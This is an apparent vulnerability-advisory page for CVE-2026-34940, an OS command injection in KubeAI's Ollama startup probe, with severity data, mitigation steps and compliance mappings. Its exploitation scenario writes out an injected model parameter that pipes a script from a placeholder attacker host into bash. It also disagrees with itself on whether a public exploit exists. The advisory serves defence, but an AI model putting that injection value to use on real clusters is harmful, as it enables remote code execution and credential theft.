CVE-2026-34940: KubeAI: RCE via shell injection in Ollama startup probe

HIGH CISA: ATTEND
Published April 6, 2026
CISO Take

KubeAI's ollamaStartupProbeScript() function constructs bash commands using unsanitized model URL parameters (ref, modelParam), enabling OS command injection (CWE-78) that Kubernetes executes as a startup probe inside model server pods. Any principal with RBAC permissions to create or modify Model custom resources can run arbitrary commands in your LLM inference pods — potentially exposing model weights, API credentials, and internal cluster network access. While no public exploit exists and CISA KEV status is negative, this is a straightforward OS command injection requiring minimal skill once cluster-level access to Model CRDs is obtained. Upgrade to KubeAI 0.23.2 immediately; as interim mitigation, tightly restrict RBAC for the Model custom resource (create/update/patch verbs) to trusted operators only.

Sources: NVD GitHub Advisory ATLAS

What is the risk?

Effective risk is HIGH despite the absent CVSS score. CWE-78 OS command injection executed via bash -c inside Kubernetes pods is inherently critical when reachable. The attack surface is gated behind Kubernetes RBAC for Model custom resources, reducing external exposure but not insider or post-compromise threat actor risk. In multi-tenant clusters, over-permissive CI/CD service accounts, or environments where users can submit model definitions, this becomes trivially exploitable. RCE inside model serving pods directly threatens confidentiality of LLM inference infrastructure. Any automated pipeline that processes external model URLs into Model CRDs dramatically expands the blast radius.

How severe is it?

CVSS 3.1
8.8 / 10
EPSS
0.4%
chance of exploitation in 30 days
Higher than 36% of all CVEs
Exploitation Status
Exploit Available
Exploitation: MEDIUM
Sophistication
Moderate
Exploitation Confidence
medium
CISA SSVC: Public PoC
Composite signal derived from CISA KEV, VulnCheck KEV, CISA SSVC, EPSS, Metasploit, Exploit-DB, trickest/cve, Nuclei templates, and inthewild.io exploitation reports.

What is the attack surface?

AV AC PR UI S C I A
AV Network
AC Low
PR Low
UI None
S Unchanged
C High
I High
A High

What should I do?

5 steps
  1. PATCH

    Upgrade KubeAI to 0.23.2 — the fix sanitizes model URL components before shell command construction.

  2. RBAC AUDIT

    Restrict Kubernetes RBAC on Model custom resources immediately — deny create/update/patch to all principals except trusted operators. Run: kubectl get rolebindings,clusterrolebindings -A -o json | grep -i model to surface over-permissive bindings.

  3. REVIEW

    Audit existing Model CRDs for suspicious injected values in ref/modelParam fields: kubectl get models -A -o yaml | grep -E '(ref|modelParam)' and inspect for shell metacharacters (;, |, $, backticks).

  4. DETECT

    Monitor model server pods for unexpected child processes spawned from startup probes using Falco or similar runtime security tools.

  5. HARDEN

    Apply Pod Security Standards (restricted profile) and NetworkPolicies to model serving namespaces to limit blast radius if exploitation occurs.

What does CISA's SSVC say?

Decision Attend
Exploitation poc
Automatable No
Technical Impact total

Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.

How is it classified?

Which compliance frameworks are affected?

This CVE is relevant to:

EU AI Act
Article 9 - Risk management system
ISO 42001
A.9.1 - Security of AI systems
NIST AI RMF
MANAGE 2.2 - Risks associated with AI system components
OWASP LLM Top 10
LLM06:2025 - Excessive Agency

Frequently Asked Questions

What is CVE-2026-34940?

KubeAI's ollamaStartupProbeScript() function constructs bash commands using unsanitized model URL parameters (ref, modelParam), enabling OS command injection (CWE-78) that Kubernetes executes as a startup probe inside model server pods. Any principal with RBAC permissions to create or modify Model custom resources can run arbitrary commands in your LLM inference pods — potentially exposing model weights, API credentials, and internal cluster network access. While no public exploit exists and CISA KEV status is negative, this is a straightforward OS command injection requiring minimal skill once cluster-level access to Model CRDs is obtained. Upgrade to KubeAI 0.23.2 immediately; as interim mitigation, tightly restrict RBAC for the Model custom resource (create/update/patch verbs) to trusted operators only.

Is CVE-2026-34940 actively exploited?

No confirmed active exploitation of CVE-2026-34940 has been reported, but organizations should still patch proactively.

How to fix CVE-2026-34940?

1. PATCH: Upgrade KubeAI to 0.23.2 — the fix sanitizes model URL components before shell command construction. 2. RBAC AUDIT: Restrict Kubernetes RBAC on Model custom resources immediately — deny create/update/patch to all principals except trusted operators. Run: kubectl get rolebindings,clusterrolebindings -A -o json | grep -i model to surface over-permissive bindings. 3. REVIEW: Audit existing Model CRDs for suspicious injected values in ref/modelParam fields: kubectl get models -A -o yaml | grep -E '(ref|modelParam)' and inspect for shell metacharacters (;, |, $, backticks). 4. DETECT: Monitor model server pods for unexpected child processes spawned from startup probes using Falco or similar runtime security tools. 5. HARDEN: Apply Pod Security Standards (restricted profile) and NetworkPolicies to model serving namespaces to limit blast radius if exploitation occurs.

What systems are affected by CVE-2026-34940?

This vulnerability affects the following AI/ML architecture patterns: model serving, Kubernetes-based AI deployments, LLM inference infrastructure, MLOps pipelines.

What is the CVSS score for CVE-2026-34940?

CVE-2026-34940 has a CVSS v3.1 base score of 8.8 (HIGH). The EPSS exploitation probability is 0.45%.

What is the AI security impact?

Affected AI Architectures

model servingKubernetes-based AI deploymentsLLM inference infrastructureMLOps pipelines

MITRE ATLAS Techniques

AML.T0012 Valid Accounts
AML.T0049 Exploit Public-Facing Application
AML.T0050 Command and Scripting Interpreter

Compliance Controls Affected

EU AI Act: Article 9
ISO 42001: A.9.1
NIST AI RMF: MANAGE 2.2
OWASP LLM Top 10: LLM06:2025

What are the technical details?

Original Advisory

KubeAI is an AI inference operator for kubernetes. Prior to 0.23.2, the ollamaStartupProbeScript() function in internal/modelcontroller/engine_ollama.go constructs a shell command string using fmt.Sprintf with unsanitized model URL components (ref, modelParam). This shell command is executed via bash -c as a Kubernetes startup probe. An attacker who can create or update Model custom resources can inject arbitrary shell commands that execute inside model server pods. This vulnerability is fixed in 0.23.2.

Exploitation Scenario

An attacker holding Kubernetes credentials that allow Model CRD updates — obtained via a compromised CI/CD service account, misconfigured RBAC, or insider access — crafts a Model resource with a malicious modelParam field such as 'llama3; curl http://attacker.com/implant.sh | bash; echo '. When KubeAI's controller processes this resource, ollamaStartupProbeScript() interpolates the unsanitized value into a bash -c command that Kubernetes executes as the pod startup probe. The injected commands run inside the model server container with the pod's service account privileges, enabling the attacker to exfiltrate Hugging Face tokens, cloud provider credentials, or model artifacts, pivot to other cluster services via the internal network, or establish persistence inside the inference infrastructure for long-term access.

Weaknesses (CWE)

CWE-78 — Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection'): The product constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component.

  • [Architecture and Design] If at all possible, use library calls rather than external processes to recreate the desired functionality.
  • [Architecture and Design, Operation] Run the code in a "jail" or similar sandbox environment that enforces strict boundaries between the process and the operating system. This may effectively restrict which files can be accessed in a particular directory or which commands can be executed by the software. OS-level examples include the Unix chroot jail, AppArmor, and SELinux. In general, managed code may provide some protection. For example, java.io.FilePermission in the Java SecurityManager allows the software to specify restrictions on file operations. This may not be a feasible solution, and it only limits the impact to the operating system; the rest of the application may still be subject to compromise. Be careful to avoid CWE-243 and other weaknesses related to jails.

Source: MITRE CWE corpus.

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Timeline

Published
April 6, 2026
Last Modified
April 15, 2026
First Seen
April 6, 2026

Related Vulnerabilities